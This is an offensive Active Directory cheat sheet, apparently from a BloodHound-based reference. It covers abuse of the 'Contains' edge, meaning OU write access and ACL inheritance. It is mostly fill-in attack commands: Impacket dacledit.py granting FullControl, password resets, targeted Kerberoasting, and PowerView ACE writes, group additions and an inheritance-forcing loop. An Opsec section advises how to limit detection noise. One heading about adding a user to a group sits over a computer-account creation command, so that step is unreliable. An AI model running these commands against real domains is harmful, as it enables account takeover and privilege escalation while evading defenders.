{"title": "Contains", "source": "bloodhound", "source_label": "BloodHound", "path": "edges/Contains", "html": "<h1 id=\"contains\">Contains</h1>\n<blockquote>\n<p>An OU or Domain contains (is the parent of) the target object. When combined with write access over the OU, ACL inheritance enables attacks on all contained objects.</p>\n</blockquote>\n<p><strong>Applies to</strong>: Domain/OU → User/Group/Computer/OU</p>\n<hr>\n<h2 id=\"note\">Note</h2>\n<p>Contains is structural. It becomes an abuse path when you have <strong>GenericAll, WriteDACL, or GenericWrite on the OU</strong> — changes to the OU ACL inherit down to all contained objects.</p>\n<hr>\n<h2 id=\"linux-abuse\">Linux Abuse</h2>\n<h3 id=\"add-ace-to-ou-dacl-grant-yourself-genericall-on-all-contained-objects\">Add ACE to OU DACL — grant yourself GenericAll on all contained objects</h3>\n<div class=\"highlight\"><pre><span></span><code><span class=\"c1\"># Using dacledit.py (impacket)</span>\ndacledit.py<span class=\"w\"> </span>-action<span class=\"w\"> </span>write<span class=\"w\"> </span>-rights<span class=\"w\"> </span>FullControl<span class=\"w\"> </span>-principal<span class=\"w\"> </span>&lt;username&gt;<span class=\"w\"> </span>-target-dn<span class=\"w\"> </span><span class=\"s1\">&#39;OU=&lt;ou-name&gt;,DC=&lt;domain&gt;,DC=&lt;tld&gt;&#39;</span><span class=\"w\"> </span><span class=\"s1\">&#39;&lt;domain&gt;/&lt;username&gt;:&lt;password&gt;&#39;</span><span class=\"w\"> </span>-dc-ip<span class=\"w\"> </span>&lt;dc-ip&gt;\n</code></pre></div>\n<h3 id=\"verify-ace-written\">Verify ACE written</h3>\n<div class=\"highlight\"><pre><span></span><code>dacledit.py<span class=\"w\"> </span>-action<span class=\"w\"> </span><span class=\"nb\">read</span><span class=\"w\"> </span>-target-dn<span class=\"w\"> </span><span class=\"s1\">&#39;OU=&lt;ou-name&gt;,DC=&lt;domain&gt;,DC=&lt;tld&gt;&#39;</span><span class=\"w\"> </span><span class=\"s1\">&#39;&lt;domain&gt;/&lt;username&gt;:&lt;password&gt;&#39;</span><span class=\"w\"> </span>-dc-ip<span class=\"w\"> </span>&lt;dc-ip&gt;\n</code></pre></div>\n<h3 id=\"reset-password-of-user-in-ou-after-inheriting-genericall\">Reset password of user in OU (after inheriting GenericAll)</h3>\n<div class=\"highlight\"><pre><span></span><code>changepasswd.py<span class=\"w\"> </span>-newpass<span class=\"w\"> </span><span class=\"s1\">&#39;&lt;new-password&gt;&#39;</span><span class=\"w\"> </span><span class=\"s1\">&#39;&lt;domain&gt;/&lt;username&gt;:&lt;password&gt;&#39;</span>@&lt;dc-ip&gt;<span class=\"w\"> </span>-target<span class=\"w\"> </span><span class=\"s1\">&#39;&lt;domain&gt;/&lt;target-user&gt;&#39;</span>\n</code></pre></div>\n<h3 id=\"add-owned-user-to-group-after-inheriting-genericall-over-group-in-ou\">Add owned user to group (after inheriting GenericAll over group in OU)</h3>\n<div class=\"highlight\"><pre><span></span><code>addcomputer.py<span class=\"w\"> </span>-computer-name<span class=\"w\"> </span><span class=\"s1\">&#39;&lt;computer-name&gt;$&#39;</span><span class=\"w\"> </span>-computer-pass<span class=\"w\"> </span><span class=\"s1\">&#39;&lt;password&gt;&#39;</span><span class=\"w\"> </span>-dc-ip<span class=\"w\"> </span>&lt;dc-ip&gt;<span class=\"w\"> </span><span class=\"s1\">&#39;&lt;domain&gt;/&lt;username&gt;:&lt;password&gt;&#39;</span>\n</code></pre></div>\n<h3 id=\"targeted-kerberoast-user-in-ou-after-setting-spn-via-genericwrite\">Targeted Kerberoast user in OU (after setting SPN via GenericWrite)</h3>\n<div class=\"highlight\"><pre><span></span><code>targetedKerberoast.py<span class=\"w\"> </span>-d<span class=\"w\"> </span>&lt;domain&gt;<span class=\"w\"> </span>-u<span class=\"w\"> </span>&lt;username&gt;<span class=\"w\"> </span>-p<span class=\"w\"> </span><span class=\"s1\">&#39;&lt;password&gt;&#39;</span><span class=\"w\"> </span>--dc-ip<span class=\"w\"> </span>&lt;dc-ip&gt;\n</code></pre></div>\n<hr>\n<h2 id=\"windows-abuse\">Windows Abuse</h2>\n<h3 id=\"add-ace-granting-genericall-on-ou-powerview\">Add ACE granting GenericAll on OU (PowerView)</h3>\n<div class=\"highlight\"><pre><span></span><code><span class=\"nb\">Add-DomainObjectAcl</span> <span class=\"n\">-TargetIdentity</span> <span class=\"s1\">&#39;&lt;ou-name&gt;&#39;</span> <span class=\"n\">-PrincipalIdentity</span> <span class=\"p\">&lt;</span><span class=\"n\">username</span><span class=\"p\">&gt;</span> <span class=\"n\">-Rights</span> <span class=\"n\">All</span> <span class=\"n\">-Verbose</span>\n</code></pre></div>\n<h3 id=\"confirm-acl-inheritance-is-enabled-on-ou-objects\">Confirm ACL inheritance is enabled on OU objects</h3>\n<div class=\"highlight\"><pre><span></span><code><span class=\"nb\">Get-DomainObjectAcl</span> <span class=\"n\">-Identity</span> <span class=\"s1\">&#39;&lt;ou-name&gt;&#39;</span> <span class=\"n\">-ResolveGUIDs</span> <span class=\"p\">|</span> <span class=\"nb\">Where-Object</span> <span class=\"p\">{</span><span class=\"nv\">$_</span><span class=\"p\">.</span><span class=\"n\">SecurityIdentifier</span> <span class=\"o\">-match</span> <span class=\"s1\">&#39;&lt;sid&gt;&#39;</span><span class=\"p\">}</span>\n</code></pre></div>\n<h3 id=\"reset-contained-user-password-after-acl-inheritance\">Reset contained user password after ACL inheritance</h3>\n<div class=\"highlight\"><pre><span></span><code><span class=\"nv\">$cred</span> <span class=\"p\">=</span> <span class=\"nb\">New-Object</span> <span class=\"n\">System</span><span class=\"p\">.</span><span class=\"n\">Management</span><span class=\"p\">.</span><span class=\"n\">Automation</span><span class=\"p\">.</span><span class=\"n\">PSCredential</span><span class=\"p\">(</span><span class=\"s1\">&#39;&lt;domain&gt;\\&lt;username&gt;&#39;</span><span class=\"p\">,</span> <span class=\"p\">(</span><span class=\"nb\">ConvertTo-SecureString</span> <span class=\"s1\">&#39;&lt;password&gt;&#39;</span> <span class=\"n\">-AsPlainText</span> <span class=\"n\">-Force</span><span class=\"p\">))</span>\n<span class=\"nb\">Set-DomainUserPassword</span> <span class=\"n\">-Identity</span> <span class=\"p\">&lt;</span><span class=\"n\">target-user</span><span class=\"p\">&gt;</span> <span class=\"n\">-AccountPassword</span> <span class=\"p\">(</span><span class=\"nb\">ConvertTo-SecureString</span> <span class=\"s1\">&#39;&lt;new-password&gt;&#39;</span> <span class=\"n\">-AsPlainText</span> <span class=\"n\">-Force</span><span class=\"p\">)</span> <span class=\"n\">-Credential</span> <span class=\"nv\">$cred</span>\n</code></pre></div>\n<h3 id=\"add-user-to-group-after-acl-inheritance\">Add user to group after ACL inheritance</h3>\n<div class=\"highlight\"><pre><span></span><code><span class=\"nb\">Add-DomainGroupMember</span> <span class=\"n\">-Identity</span> <span class=\"s1\">&#39;&lt;group-name&gt;&#39;</span> <span class=\"n\">-Members</span> <span class=\"s1\">&#39;&lt;username&gt;&#39;</span> <span class=\"n\">-Credential</span> <span class=\"nv\">$cred</span>\n</code></pre></div>\n<h3 id=\"enable-acl-inheritance-on-all-objects-in-ou-if-blocked\">Enable ACL inheritance on all objects in OU (if blocked)</h3>\n<div class=\"highlight\"><pre><span></span><code><span class=\"nb\">Get-ADObject</span> <span class=\"n\">-Filter</span> <span class=\"p\">*</span> <span class=\"n\">-SearchBase</span> <span class=\"s1\">&#39;OU=&lt;ou-name&gt;,DC=&lt;domain&gt;,DC=&lt;tld&gt;&#39;</span> <span class=\"p\">|</span> <span class=\"k\">ForEach</span><span class=\"n\">-Object</span> <span class=\"p\">{</span>\n    <span class=\"nv\">$acl</span> <span class=\"p\">=</span> <span class=\"nb\">Get-Acl</span> <span class=\"n\">-Path</span> <span class=\"s2\">&quot;AD:\\</span><span class=\"p\">$(</span><span class=\"nv\">$_</span><span class=\"p\">.</span><span class=\"n\">DistinguishedName</span><span class=\"p\">)</span><span class=\"s2\">&quot;</span>\n    <span class=\"nv\">$acl</span><span class=\"p\">.</span><span class=\"n\">SetAccessRuleProtection</span><span class=\"p\">(</span><span class=\"nv\">$false</span><span class=\"p\">,</span> <span class=\"nv\">$true</span><span class=\"p\">)</span>\n    <span class=\"nb\">Set-Acl</span> <span class=\"n\">-Path</span> <span class=\"s2\">&quot;AD:\\</span><span class=\"p\">$(</span><span class=\"nv\">$_</span><span class=\"p\">.</span><span class=\"n\">DistinguishedName</span><span class=\"p\">)</span><span class=\"s2\">&quot;</span> <span class=\"n\">-AclObject</span> <span class=\"nv\">$acl</span>\n<span class=\"p\">}</span>\n</code></pre></div>\n<hr>\n<h2 id=\"opsec\">Opsec</h2>\n<ul>\n<li>Writing ACEs to OU generates Event ID 5136 (directory service object modified)</li>\n<li>ACL inheritance propagation is not immediate — may take seconds to minutes</li>\n<li>Prefer targeting specific objects over blanket OU ACL modification to reduce noise</li>\n</ul>", "excerpt": "Contains An OU or Domain contains (is the parent of) the target object. When combined with write access over the OU, ACL inheritance enables attacks on all contained objects. Applies to : Domain/OU → User/Group/Computer/OU Note Contains is…", "tags": []}